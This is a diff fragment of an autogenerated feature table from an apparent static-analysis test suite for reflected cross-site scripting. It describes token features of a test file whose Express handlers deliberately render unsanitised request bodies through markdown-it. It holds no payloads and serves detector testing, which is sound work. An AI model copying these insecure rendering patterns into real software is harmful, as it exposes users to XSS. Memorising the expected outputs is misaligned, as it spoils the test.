rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:29:91:41 | 'markdown-it' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:29:91:41 | 'markdown-it' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:29:91:41 | 'markdown-it' | calleeImports | | @@ -20084,6 +134432,40 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:44:91:45 | {} | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:44:91:45 | {} | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:44:91:45 | {} | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:7:93:17 | markdownIt3 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:7:93:17 | markdownIt3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:7:93:17 | markdownIt3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:7:93:17 | markdownIt3 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:7:94:42 | markdow ... htjs')) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:7:94:42 | markdow ... htjs')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:7:94:42 | markdow ... htjs')) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:7:94:42 | markdownIt3 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:7:94:42 | markdownIt3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:7:94:42 | markdownIt3 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:27 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:27 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:27 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:42 | exceptional return of require ... wn-it') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:42 | exceptional return of require ... wn-it') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:42 | exceptional return of require ... wn-it') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:42 | require ... wn-it') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:42 | require ... wn-it') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:42 | require ... wn-it') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:56 | exceptional return of require ... true}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:56 | exceptional return of require ... true}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:56 | exceptional return of require ... true}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:56 | require ... true}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:56 | require ... true}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:93:56 | require ... true}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:94:6 | require ... \\n .use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:94:6 | require ... \\n .use | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:94:6 | require ... \\n .use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:94:42 | exceptional return of require ... htjs')) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:94:42 | exceptional return of require ... htjs')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:94:42 | exceptional return of require ... htjs')) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:94:42 | require ... htjs')) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:94:42 | require ... htjs')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:21:94:42 | require ... htjs')) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:29:93:41 | 'markdown-it' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:29:93:41 | 'markdown-it' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:29:93:41 | 'markdown-it' | calleeImports | | @@ -20096,6 +134478,15 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:44:93:55 | {html: true} | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:44:93:55 | {html: true} | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:44:93:55 | {html: true} | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:45:93:48 | html | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:45:93:48 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:45:93:48 | html | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:45:93:54 | html: true | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:45:93:54 | html: true | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:45:93:54 | html: true | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:45:93:54 | html: true | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:45:93:54 | html: true | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:45:93:54 | html: true | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:51:93:54 | true | CalleeFlexibleAccessPath | import(!) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:51:93:54 | true | InputAccessPathFromCallee | 0.html | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:51:93:54 | true | InputArgumentIndex | 0 | @@ -20104,6 +134495,15 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:51:93:54 | true | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:51:93:54 | true | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:93:51:93:54 | true | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:4:94:6 | use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:4:94:6 | use | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:4:94:6 | use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:8:94:14 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:8:94:14 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:8:94:14 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:8:94:41 | exceptional return of require ... ghtjs') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:8:94:41 | exceptional return of require ... ghtjs') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:8:94:41 | exceptional return of require ... ghtjs') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:8:94:41 | require ... ghtjs') | CalleeFlexibleAccessPath | import(!)().use | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:8:94:41 | require ... ghtjs') | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:8:94:41 | require ... ghtjs') | calleeImports | markdown-it | @@ -20116,6 +134516,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:16:94:40 | 'markdo ... ightjs' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:16:94:40 | 'markdo ... ightjs' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:94:16:94:40 | 'markdo ... ightjs' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:1:96:3 | app | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:1:96:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:1:96:3 | app | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:1:96:7 | app.get | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:1:96:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:1:96:7 | app.get | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:1:104:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:1:104:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:1:104:2 | app.get ... T OK\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:1:104:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:1:104:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:1:104:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:5:96:7 | get | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:5:96:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:5:96:7 | get | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:9:96:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:9:96:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:9:96:19 | '/user/:id' | calleeImports | express | @@ -20123,6 +134538,41 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:9:96:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:9:96:19 | '/user/:id' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:9:96:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt2 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt2 | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt2 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt3 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt3 | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt3 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | markdownIt3 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | require | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | require | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | this | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | this | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:96:21 | this | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | 'arguments' object of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | exceptional return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | exceptional return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | functio ... OT OK\\n} | calleeImports | express | @@ -20130,6 +134580,61 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | functio ... OT OK\\n} | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | return of anonymous function | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:22:104:1 | return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:32:96:34 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:32:96:34 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:32:96:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:32:96:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:32:96:34 | req | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:32:96:34 | req | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:32:96:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:32:96:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:32:96:34 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:32:96:34 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:37:96:39 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:37:96:39 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:37:96:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:37:96:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:37:96:39 | res | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:37:96:39 | res | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:37:96:39 